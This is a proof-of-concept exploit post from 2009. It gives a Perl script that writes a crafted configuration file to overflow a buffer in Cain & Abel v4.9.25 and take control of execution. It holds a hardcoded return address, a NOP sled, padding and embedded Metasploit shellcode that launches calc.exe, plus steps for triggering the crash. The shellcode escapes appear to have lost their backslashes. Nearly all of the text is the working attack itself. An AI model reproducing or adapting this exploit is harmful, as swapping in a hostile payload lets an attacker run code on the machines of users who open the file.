cainabel4925-overflow.txt
Posted on 07 January 2009
#!perl -w # Simple overflow for Cain & Abel v4.9.25 (and below?) # This script will output a file; import this file as a # config file under Cracker -> Cisco IOS-MD5 Hashes # # If Cain crashes but calc.exe isn't run, change $eip to reflect # your system. # # send9 /at/ chiseclabs.com use strict; my $eip = "xD8x69x83x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2) my $nop = "x90" x 4; my $pad = "A" x 100; # win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54". "x42x50x42x30x42x50x4bx48x45x44x4ex53x4bx58x4ex57". "x45x50x4ax47x41x30x4fx4ex4bx58x4fx44x4ax31x4bx58". "x4fx35x42x32x41x30x4bx4ex49x44x4bx48x46x53x4bx48". "x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c". "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e". "x46x4fx4bx43x46x45x46x52x46x50x45x47x45x4ex4bx48". "x4fx55x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx54". "x4bx58x4fx35x4ex51x41x50x4bx4ex4bx58x4ex31x4bx38". "x41x30x4bx4ex49x58x4ex55x46x32x46x30x43x4cx41x43". "x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47". "x4ex30x4bx38x42x34x4ex30x4bx58x42x47x4ex51x4dx4a". "x4bx48x4ax56x4ax50x4bx4ex49x50x4bx48x42x38x42x4b". "x42x30x42x30x42x30x4bx48x4ax46x4ex33x4fx35x41x33". "x48x4fx42x46x48x55x49x38x4ax4fx43x58x42x4cx4bx47". "x42x35x4ax56x42x4fx4cx38x46x50x4fx55x4ax36x4ax49". "x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x41x36". "x4ex46x43x46x50x32x45x56x4ax37x45x56x42x30x5a"; my $b00m = $pad . $eip . $nop . $shellcode; open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writing "; print BOF $b00m; close(BOF); print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes. ";
